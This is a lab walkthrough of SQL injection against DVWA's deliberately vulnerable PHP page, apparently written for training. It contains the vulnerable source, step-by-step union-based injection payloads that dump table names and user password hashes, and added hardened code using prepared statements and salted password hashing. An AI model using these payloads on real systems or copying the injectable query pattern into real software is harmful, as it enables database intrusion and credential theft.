SQL Injection
Interface
Source code
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
Code analysis
After the user clicks Submit, the script reads the id entered by the user and prints the corresponding first_name and last_name. The id is concatenated straight into the query string without any validation, so SQL injection is easy.
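As an added example (not DVWA's own code), here is a hardened version of the same lookup. It assumes an existing mysqli connection in $GLOBALS['___mysqli_ston'] (the name DVWA uses above), the same users table, and the mysqlnd driver for get_result(). The id is validated as a positive integer and then bound as a parameter, so it never becomes part of the SQL text, and driver errors are logged instead of echoed.

```php
<?php
// Added example, not from the original page: hardened user lookup.
// Assumes: $GLOBALS['___mysqli_ston'] is an open mysqli connection (DVWA's name),
//          the `users` table exists, and mysqlnd is available for get_result().
declare(strict_types=1);

/**
 * Returns true only for a plain positive integer id such as "1".
 * Every payload from the walkthrough ("1' or '1'='1", "1' union select ...")
 * fails this check before the database is ever touched.
 */
function is_valid_user_id(string $raw): bool
{
    return filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) !== false;
}

/**
 * Looks up one user by id with a prepared statement.
 * Returns ['first_name' => ..., 'last_name' => ...] or null when not found / invalid.
 */
function lookup_user(mysqli $db, string $rawId): ?array
{
    if (!is_valid_user_id($rawId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    if ($stmt === false) {
        // Log the real driver error server-side; never echo it to the client.
        // The original die(mysqli_error(...)) leaks database details (see step 8's hex problem).
        error_log('prepare failed: ' . $db->error);
        return null;
    }
    $stmt->bind_param('i', $rawId);   // 'i' = integer parameter, cast by the driver, not concatenated
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Request handling, mirroring the original control flow.
if (isset($_REQUEST['Submit'])) {
    $id  = (string) ($_REQUEST['id'] ?? '');
    $row = lookup_user($GLOBALS['___mysqli_ston'], $id);
    if ($row === null) {
        echo '<pre>No such user</pre>';
    } else {
        // Escape output too: the names come from the database and may contain HTML.
        printf(
            '<pre>ID: %s<br />First name: %s<br />Surname: %s</pre>',
            htmlspecialchars($id, ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($row['last_name'], ENT_QUOTES, 'UTF-8')
        );
    }
}
```

With this version, the order by / union select inputs from the steps that follow are rejected by is_valid_user_id() before any query runs, and even a value that passed validation could not change the query structure because it is bound, not interpolated.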
Penetration steps
Step 1: Enter 1 and view the result.
Step 2: Enter 1' or '1'='1 and view the result. All the id data in the database is returned, so there is indeed a SQL injection vulnerability.
Step 3: Guess the number of fields of the current database with order by. Enter 1' or 1=1 order by 1 #; the result is normal.
Step 4: Enter 1' or 1=1 order by 2 #; the result is normal.
Step 5: Enter 1' or 1=1 order by 3 #; the result is abnormal, so the current database has only two fields, namely First name and Surname.
Step 6: Enter 1' union select 1,2. You can see 1 and 2 in the second column of the output, so the values 1 and 2 can be replaced to obtain the data I want.
Step 7: To test the previous conjecture, enter 1' union select database(),version()# to get the current database name and database version. The result confirms that union select can be used to obtain the desired data.
Step 8: Enter 1' union select 1,hex(group_concat(table_name)) from information_schema.tables where table_schema=database()# to get the names of the tables in the database.
Step 9: Decode the obtained hex to get the real table names: guestbook and users. Just two tables.
Step 10: Enter 1' union select 1,hex(group_concat(column_name)) from information_schema.columns where table_name='users' # to view the field names in the users table.
Step 11: Enter 1' union select first_name,password from users# to query the user names and passwords.
Step 12: Use an md5 decryption tool to decrypt the obtained passwords; the result is correct.
Problems encountered
1. Why is the hex function used in steps 8 and 10?
Solution: If the hex function is not used, an error is reported. This is caused by an encoding problem.
Error picture: (screenshot not reproduced here)
2. How to determine that the database uses md5 to store passwords?
Solution: Guess, and good luck.
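Step 12 only works because the users table stores unsalted MD5 hashes, which an "md5 decryption tool" can reverse by lookup. As an added example (not part of DVWA or this writeup), the function below shows the defender-side fix: checking a password against a stored hash with password_verify(), and transparently replacing a legacy 32-hex-character MD5 row with a salted password_hash() value the first time the user logs in successfully. The sample hash at the bottom is constructed with md5('password') for illustration.

```php
<?php
// Added example, not from the original page: migrate legacy MD5 rows to password_hash().
declare(strict_types=1);

/**
 * Checks $password against $stored. Returns null on failure, otherwise the hash
 * that should now be saved for this user: a fresh password_hash() result when the
 * row still holds a legacy unsalted MD5 (or an outdated algorithm), else $stored.
 */
function verify_and_upgrade(string $stored, string $password): ?string
{
    $isLegacyMd5 = (bool) preg_match('/^[0-9a-f]{32}$/i', $stored);

    if ($isLegacyMd5) {
        // Constant-time comparison of the legacy hash; on success, upgrade immediately.
        if (!hash_equals(strtolower($stored), md5($password))) {
            return null;
        }
        return password_hash($password, PASSWORD_DEFAULT);   // salted bcrypt, per-user salt
    }

    if (!password_verify($password, $stored)) {
        return null;
    }
    // Re-hash if PHP's default cost/algorithm has moved on since the row was written.
    return password_needs_rehash($stored, PASSWORD_DEFAULT)
        ? password_hash($password, PASSWORD_DEFAULT)
        : $stored;
}

// Constructed sample: a legacy row like the ones dumped in step 11.
$legacy = md5('password');

$upgraded = verify_and_upgrade($legacy, 'password');
if ($upgraded === null || !password_verify('password', $upgraded)) {
    throw new RuntimeException('correct password should verify and yield a new hash');
}
if (verify_and_upgrade($legacy, 'wrong') !== null) {
    throw new RuntimeException('wrong password must be rejected');
}
if (verify_and_upgrade($upgraded, 'password') !== $upgraded) {
    throw new RuntimeException('a current hash should be kept as-is');
}

echo "legacy md5:   $legacy\n";
echo "upgraded row: $upgraded\n";   // differs on every run because of the random salt
```

Once rows are migrated, a dump obtained through the injection above yields salted bcrypt strings that cannot be reversed by hash lookup, which removes the payoff of step 12 even if the query itself were still injectable.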